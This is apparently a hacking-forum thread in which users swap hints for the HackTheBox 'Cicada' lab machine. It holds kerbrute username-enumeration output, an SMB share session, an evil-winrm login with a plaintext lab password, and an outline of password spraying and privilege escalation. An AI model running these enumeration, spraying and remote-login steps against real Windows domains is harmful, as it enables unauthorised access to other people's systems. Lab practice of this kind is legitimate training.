[AncientNull]

Did you just do a normal wordlist? Or do they leak usernames somewhere. I'm struggling to find one with those in it.

kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

[marco1337]

─(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.11.35/DEV -U david.orelious

Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  D        0  Thu Mar 14 12:31:39 2024
  ..                                  D        0  Thu Mar 14 12:21:29 2024
  Backup_script.ps1                  A      601  Wed Aug 28 17:28:22 2024

                4168447 blocks of size 4096. 334899 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> exit

use evilwinrm to login as emily.oscars. the creds is in the backup_script.ps1

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[htbtester1]

evil-winrm -i 10.129.24.214 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

[beatman]

kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which wordlist did you use?

[spamdegratis5]

The list of users is obtainable by using --rid-brute in crackmapexec/netexec.
Then you can use crackmapexec to passwordspray the password from the .txt.
From there you need to check the list of users using the set of credentials, you will find another set of credentials, from there you can check the shares again and obtain the last set of credentials.
From there you can obtain system by leveraging the group of that last user.

[Detector6]

kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

that doesn't explain the wordlist. orelious is not a common surname

[htbtester1]

For root: https://www.hackingarticles.in/windows-p...privilege/


Fun machine!

[kevindragonfly]

any news on root guys?

[mamadoubarla]

any news on root guys?

i have posted a threads for the commands to get root.txt

[Dtom]

for root  read
https://kb.offsec.nl/tools/techniques/ba...ratortoda/